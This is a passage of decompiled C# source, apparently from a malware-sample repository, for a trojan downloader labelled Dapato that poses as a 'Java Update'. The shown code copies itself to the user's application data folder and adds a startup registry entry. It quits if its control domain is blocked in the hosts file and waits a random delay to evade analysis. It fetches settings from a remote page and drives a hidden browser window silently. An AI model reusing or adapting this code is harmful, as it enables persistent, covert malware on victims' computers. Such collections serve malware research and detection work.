return flag;
}
private void SureliIslet(Form1.SureliFonksiyon x, int min, int max)
{
System.Windows.Forms.Timer timer = new System.Windows.Forms.Timer()
{
Interval = this.rnd.Next(min, max)
};
timer.Tick += (EventHandler) ((s, ev) =>
{
x();
((System.Windows.Forms.Timer) s).Stop();
((Component) s).Dispose();
});
timer.Start();
}
private void PanelAyarla()
{
string newValue = "";
WebHeaderCollection headerCollection1 = new WebHeaderCollection();
headerCollection1.Add("User-Agent", "Mozilla/4.0 (compatiple; MSIE 6.0; Windows NT 5.1)");
WebHeaderCollection headerCollection2 = headerCollection1;
using (WebClient webClient = new WebClient()
{
Encoding = Encoding.Default,
Headers = headerCollection2
})
{
try
{
newValue = new Regex("1(.*?)2", RegexOptions.IgnoreCase | RegexOptions.Compiled).Match(webClient.DownloadString(this.ana)).Groups[1].ToString();
}
catch (Exception ex)
{
Environment.Exit(-1);
}
}
this.baba = this.baba.Replace("[DEGISTIR]", newValue);
}
private void Form1_Load(object sender, EventArgs e)
{
this.Size = new Size(this.rnd.Next(1024, 1366), this.rnd.Next(768, 768));
Form1.SetWindowLong(this.Handle, -20, Form1.GetWindowLong(this.Handle, -20) | 128);
this.ieKontrol();
this.PanelAyarla();
this.KelimeleriCek();
Araclar.DisableClickSounds();
this.Basla();
}
private void ieKontrol()
{
if (new WebBrowser().Version.Major < 7)
Environment.Exit(-1);
}
private delegate void SureliFonksiyon();
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/browser_bastan/Program.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: browser_bastan.Program
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using SmartAssembly.MemoryManagement;
using System;
using System.IO;
using System.Threading;
using System.Windows.Forms;
namespace browser_bastan
{
internal static class Program
{
public static Mutex AppMutex = new Mutex(true, "{8F6F0AC4-B9A1-45fd-A8CF-72F04X6FDKCK}");
[STAThread]
private static void Main()
{
MemoryManager.AttachApp();
if (Program.AppMutex.WaitOne(TimeSpan.Zero, true))
{
Program.CheckHostsFile();
string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\" + Araclar.DstName;
Araclar.DstCheck();
Araclar.Startup(Araclar.Regkeyname, path);
Thread.Sleep(new Random().Next(5000, 60000));
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
Program.AppMutex.ReleaseMutex();
}
else
Environment.Exit(1);
}
public static void CheckHostsFile()
{
if (!File.ReadAllText(Environment.GetEnvironmentVariable("windir") + "\\system32\\drivers\\etc\\hosts").Contains("nurullahuzmez.com"))
return;
Environment.Exit(1);
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/{56ab1832-9ffe-43ad-8f8b-23253f3aef61}
BIN
View File
Binary file not shown.